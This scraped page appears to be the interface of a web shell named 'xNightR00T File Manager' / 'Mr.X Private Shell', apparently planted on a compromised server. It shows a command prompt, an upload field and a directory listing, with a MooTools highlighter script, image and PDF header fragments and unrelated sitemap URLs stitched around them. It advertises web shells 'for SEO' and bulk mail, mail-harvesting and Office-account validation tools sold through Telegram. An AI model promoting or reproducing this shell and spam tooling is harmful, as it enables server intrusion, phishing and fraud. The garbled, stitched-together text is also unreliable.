xNightR00T File Manager

Loading...
Current Directory:
Name Size Permission Modified Actions
Loading...
$ Waiting for command...
����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

ftpuser@216.73.216.168: ~ $
var Highlighter = new Class({
    
	  /* implements */
	  Implements: [Options],

	  /* options */
	  options: {
	    autoUnhighlight: true,
	    caseSensitive: false,
	    elements: '*',
	    className: '',
	    onlyWords: false,
	    tag: 'span'
	  },
	  
	  /* initialization */
	  initialize: function(options) {
	    /* set options */
	    this.setOptions(options);
	    this.elements = $$(this.options.elements);
	    this.words = [];
	  },
	  
	  /* directs the plugin to highlight elements */
	  highlight: function(words,elements,className) {
	    
	    /* figure out what we need to use as element(s) */
	    var elements = $$(elements || this.elements);
	    var klass = className || this.options.className;
	    if (words.constructor === String) { words = [words]; }
	    
	    /* auto unhighlight old words? */
	    if(this.options.autoUnhighlight) { this.unhighlight(); }
	    
	    /* set the pattern and regex */
	    var pattern = '(' + words.join('|') + ')';
	    pattern = this.options.onlyWords ? '\\b' + pattern + '\\b' : pattern;
	    var regex = new RegExp(pattern, this.options.caseSensitive ? '' : 'i');
	    
	    /* run it for each element! */
	    elements.each(function(el) { this.recurse(el,regex,klass); },this);
	    
	    /* make me chainable! */
	    return this;
	  }, 
	  
	  /* unhighlights items */
	  unhighlight: function(words) {
	    //var selector = this.options.tag + (word ? '[rel=' + word + ']' : '');
		  
	    if (words.constructor === String) { words = [words]; }
	    
	    words.each(function(word) {
	      word = (this.options.caseSensitive ? word : word.toUpperCase());
	      if(this.words[word]) {
	        var elements = $$(this.words[word]);
	        elements.set('class','');
	        elements.each(function(el) {
	          var tn = document.createTextNode(el.get('text'));
	          el.getParent().replaceChild(tn,el);
	          console.log(tn);
	        });
	      }
	    },this);
	    return this;
	  },
	  
	  /* recursed function */
	  recurse: function(node,regex,klass) {
	      if (node.nodeType === 3) {
	        var match = node.data.match(regex);
	        if (match) {
	          /* new element */
	          var highlight = new Element(this.options.tag);
	          highlight.addClass(klass);
	          var wordNode = node.splitText(match.index);
	          wordNode.splitText(match[0].length);
	          var wordClone = wordNode.cloneNode(true);
	          highlight.appendChild(wordClone);
	          wordNode.parentNode.replaceChild(highlight, wordNode);
	          highlight.set('rel',highlight.get('text'));
	          var comparer = highlight.get('text');
	          if(!this.options.caseSensitive) { comparer = highlight.get('text').toUpperCase(); }
	          if(!this.words[comparer]) { this.words[comparer] = []; }
	          this.words[comparer].push(highlight);
	          return 1;
	        }
	      } else if ((node.nodeType === 1 && node.childNodes) && !/(script|style)/i.test(node.tagName) && !(node.tagName === this.options.tag.toUpperCase() && node.className === klass)) {
	        for (var i = 0; i < node.childNodes.length; i++) {
	          i += this.recurse(node.childNodes[i],regex,klass);
	        }
	      }
	      return 0;
	    }
	  });

Filemanager

Name Type Size Permission Actions
ammap Folder 0755
datepicker Folder 0755
deploymentLibraries Folder 0755
devbar Folder 0755
highcharts Folder 0755
highcharts-new Folder 0755
highstock Folder 0755
monitor Folder 0755
plugins Folder 0755
simplemodal Folder 0755
uploader Folder 0755
FormWizard.js File 6.84 KB 0644
FragmentManager.js File 4.5 KB 0644
Fx.Scroll.Carousel.js File 2.84 KB 0644
Spinner.js File 11.52 KB 0644
TabPane.Extra.js File 1.36 KB 0644
TabPane.js File 2.46 KB 0644
ToolTip.js File 8.47 KB 0644
charts.js File 12.38 KB 0644
debuggerSettings.js File 6.98 KB 0644
defineWizard.js File 2.81 KB 0644
deploymentWizard.js File 5.04 KB 0644
ellipsis.js File 4.01 KB 0644
filter.js File 35.59 KB 0644
floatingtips.js File 8.88 KB 0644
general.js File 9.45 KB 0644
highlighter.js File 3.16 KB 0644
init.js File 5.76 KB 0644
integrateWizard.js File 2.13 KB 0644
ipwidget.js File 1.85 KB 0644
monitorRules.js File 699 B 0644
mootools-autocompleter-1.2.js File 11.67 KB 0644
mootools-more.js File 340.68 KB 0644
mootools.js File 143.5 KB 0644
onOffButton.js File 1.96 KB 0644
persistantHeaders.js File 7.28 KB 0644
placeholder.js File 970 B 0644
pluginDeploymentWizard.js File 3.58 KB 0644
plugins.js File 9.23 KB 0644
searchField.js File 3.16 KB 0644
toast.js File 8.41 KB 0644
valuesList.js File 1.74 KB 0644
version.js File 1.35 KB 0644
z-ray-libs.js File 543.21 KB 0644
z-ray-libs.min.js File 495.1 KB 0644
z-ray-libs.min.js.map File 594.33 KB 0644
zPicker.Date.js File 166 B 0644
zendcom.js File 5.35 KB 0644
zgrid.js File 14.99 KB 0644
zgrid2.js File 31.71 KB 0644
zgridApplicationInfo.js File 14.01 KB 0644
zgridAuditInfo.js File 4.89 KB 0644
zgridDirectives.js File 16.83 KB 0644
zgridEventDetails.js File 9.13 KB 0644
zgridJobDetails.js File 1.42 KB 0644
zgridLibraryDetails.js File 6.1 KB 0644
zgridPluginInfo.js File 6.96 KB 0644
zgridPolling.js File 2.14 KB 0644
zgridQueueDetails.js File 1.42 KB 0644
zgridServerDetails.js File 5.16 KB 0644
zgridVhostInfo.js File 12.79 KB 0644
zmenu.js File 6.12 KB 0644
zpager.js File 4.7 KB 0644
zsLicenseValidation.js File 2.34 KB 0644
zswebapi.js File 2.29 KB 0644
Σ(゚Д゚;≡;゚д゚)duo❤️a@$%^🥰&%PDF-0-1
https://vn-gateway.com/en/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/en/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/wp-sitemap-posts-elementor_library-1.xmlhttps://vn-gateway.com/en/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/en/wp-sitemap-users-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-users-1.xml